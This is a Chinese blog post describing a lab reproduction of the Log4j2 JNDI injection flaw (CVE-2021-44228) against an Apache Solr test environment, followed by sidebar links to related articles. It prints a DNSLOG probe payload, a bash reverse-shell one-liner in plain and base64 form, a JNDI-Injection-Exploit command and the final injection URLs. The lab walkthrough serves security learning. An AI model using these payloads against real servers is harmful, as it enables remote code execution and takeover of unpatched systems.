代码执行漏洞-log4j2漏洞

最新推荐文章于 2024-09-08 16:20:45 发布
最新推荐文章于 2024-09-08 16:20:45 发布
阅读量246 收藏 4
点赞数 5
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80402555/article/details/142025461
版权

1.执行以下命令启动靶场环境并在浏览器访问

cd log4j/CVE-2021-44228
docker-compose up -d
docker ps

2.先在自己搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果

3.可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.tw2rtx.dnslog.cn }

4、开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI项⽬地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
反弹shell
bash -i >& /dev/tcp/192.168.157.142/6666 0>&1
反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1Ny4xNDIvNjY2NiAwPiYx
最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1Ny4xNDIvNjY2NiAwPiYx }|{base64,-d}|{bash, -i}" -A "192.168.157.142"

5、服务器监听6666端口

6.拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...

/solr/admin/cores?action=${jndi:ldap://192.168.157.142:1389/ykqar5 } ${jndi:ldap://192.168.157.142:6666/uma7pn}

L黎蕊
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4jlog4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
代码执行漏洞-Log4j2漏洞
shw_yzh的博客
09-06 1162
代码执行漏洞-Log4j2漏洞
安全漏洞(1)-Log4j2远程代码执行漏洞log4j2漏洞验证
热门推荐
迷途的小兵
12-13 1万+
Log4j2远程代码执行漏洞log4j2漏洞验证
代码执行漏洞-Log4j2漏洞 vulhub CVE-2021-44228
2301_81525518的博客
09-08 276
action=${jndi:ldap://192.168.10.235:1389/g3fjso}${jndi:ldap://192.168.10.235:8888/uma7pn}JDNI项⽬地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。# 反弹shell bash -i >& /dev/tcp/192.168.10.235/8888 0>&1。步骤一:执行以下命令启动靶场环境并在浏览器访问!
Java框架安全篇--log4j2远程代码执行漏洞
m0_63138919的博客
04-06 1305
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
log4j2远程代码执行漏洞原理及复现
m0_57967573的博客
04-29 1621
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
【Apache Log4j2远程代码执行漏洞--解决方案】
iBuDongIt的博客
12-15 998
Apache Log4j2远程代码执行漏洞--解决方案漏洞说明漏洞编号漏洞复现漏洞解决 漏洞说明 Apache Log4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,被广泛应用于业务系统开发,用以记录程序输入输出日志信息。是目前较为优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可通过构造指定的恶意请求,触发远程代码执行从而获取服务器权限。 漏洞编号 CNVD-2021-95914 漏洞复现 前往:ht
Log4j2远程代码执行漏洞
2301_82000839的博客
07-08 963
log4j2漏洞是java应用常见开源日志库,是一个就Java的日志记录工具Apache Log4j2中存在JNDI注入漏洞,主要原理是利用log4j2的日志输出JNDI远程对象时,调用远程对象没做检查导致,程序将用户输入的数据进行日志记录时即可触发该漏洞并可在目标服务器上执行任意代码。该漏洞利用过程需要找到一个能触发远程加载并应用配置的输入点,迫使服务器远程加载和修改配置的前提下使目标系统通过JNDI远程获取数据库源,触发攻击者的恶意代码
log4j2 远程执行代码漏洞修复-Log4j2
抽象的螺旋
12-13 1873
概述 此次 Apache Log4j2 漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成不安全的远程代码执行。 修复参考 bug大概的执行逻辑: 黑客在自己的客户端启动一个带有恶意代码的rmi服务,通过服务端的log4j漏洞,向服务端的jndi context lookup的时候连接自己的rmi服务器,服务端连接rmi服务器执行lookup的时候会通过rmi查询到该地址指向的引用并且本地实例化这个类,所以在类中的构造方法或者静态代码块中写入逻辑,就会在服务端(jndi rmi过程中的客户端)实例
log4j2远程代码执行漏洞
jhlishero学习之路
10-25 675
log4j2远程代码执行漏洞
logging-log4j2-log4j-2.15.0-rc2.zip
12-13
- **安全补丁**:此版本主要针对CVE-2021-44228的安全漏洞进行了修复,这是一个非常严重的问题,可能导致远程代码执行Log4j 2.15.0-rc2及时响应,通过更新解决了这个问题,保障了系统的安全性。 - **性能优化**...
logging-log4j2-log4j-2.16.0-rc1.zip
12-13
这次我们关注的是"logging-log4j2-log4j-2.16.0-rc1.zip"这个压缩包,它包含了Log4j 2.16.0的Release Candidate 1版本,主要目的是修复一个严重漏洞,该漏洞可能导致远程代码执行(RCE)。 首先,我们需要了解Log4j...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
spring项目整合log4j2日志框架(含log4j无法打印出日志的情况,含解决办法)
最新发布
2301_76862031的博客
09-08 293
spring整合log4j日志 ,含log4j无法打印出日志的情况,含解决办法 这个需要使用spring框架创建对象才能显示出log4j日志。1.通过导入log4j-slf4j2-impl jar包。2.然后在创建Logger。以上两种都没有日志打印。
log4j 清除MDC上下文 MDC分类日志
CoderCoding的博客
09-04 477
在项目里需要分类收集处理日志信息,使用log4j的MDC在线程中添加分类信息。不过最近却出现日志信息记录错误的情况,具体来说,就是会出现本来是属于下一个分类的一部分信息莫名的记录到上一个分类的日志文件中了。其实,最开始暴露给我们的现象是,在日志清空后,第一次运行任务,会出现两条日志。不过最近却出现日志信息记录错误的情况,具体来说,就是会出现本来是属于下一个分类的一部分信息莫名的记录到上一个分类的日志文件中了。其实,最开始暴露给我们的现象是,在日志清空后,第一次运行任务,会出现两条日志。
log4j 同一线程隔离classloader下MDC信息不同问题解决 ThreadLocal问题分析
CoderCoding的博客
09-06 538
一个任务的日志信息会被莫名的拆分到两个不同目录中。经过分析,首先怀疑的是MDC没有清理的问题,这也是最直观的问题。由于线程会被重用,而MDC是绑定在Threadlocal上的,所以如果没有清理,是会造成上述问题。但是在代码检查中发现在线程的开始,是重新设置过MDC信息的。经过分析,首先怀疑的是MDC没有清理的问题,这也是最直观的问题。由于线程会被重用,而MDC是绑定在Threadlocal上的,所以如果没有清理,是会造成上述问题。但是在代码检查中发现在线程的开始,是重新设置过MDC信息的。
Python参数传递的艺术:解锁编程灵活性的秘密武器
qq_44771627的博客
09-03 575
参数传递作为函数调用过程中的关键环节,对程序逻辑有着重要影响。不同的参数传递方式能够帮助我们更好地组织代码,提高程序运行效率。比如,在处理大量数据或复杂业务逻辑时,合理的参数设计可以让我们的代码更简洁、更高效;而在进行单元测试或者接口调试时,灵活的参数机制又能极大地方便我们定位问题所在。因此,深入理解Python中的参数传递机制是非常必要的。
apache log4j2远程代码执行漏洞检测工具
08-31
Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求,远程执行任意代码,导致服务器完全被控制。 为了帮助检测这个漏洞,一些安全公司和社区为用户提供了相关工具。这些工具可以扫描用户的服务器和应用程序,检测是否受到Apache Log4j2远程代码执行漏洞的威胁。 这些工具通常会发送特定的请求来触发漏洞,并检查服务器的日志文件或响应,以确定是否存在漏洞。如果漏洞存在,工具将提供警告或报告,并建议相应的修复措施。 除了工具之外,用户还可以手动检查漏洞。他们可以通过编辑Log4j2的配置文件,将关键性日志记录功能设置为丢失或关闭。关闭该功能可以阻止攻击者利用漏洞,但也可能导致一些日志记录功能的失效。 为了更好地保护服务器和应用程序,用户应该尽快更新Apache Log4j2到最新版本。此外,他们还应该保持注意,及时关注安全更新和公告,并及时采取相应措施。 总之,Apache Log4j2远程代码执行漏洞检测工具是一种帮助用户发现漏洞并提供修复建议的工具。用户可以使用这些工具进行定期扫描,发现并处理潜在的漏洞,以提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值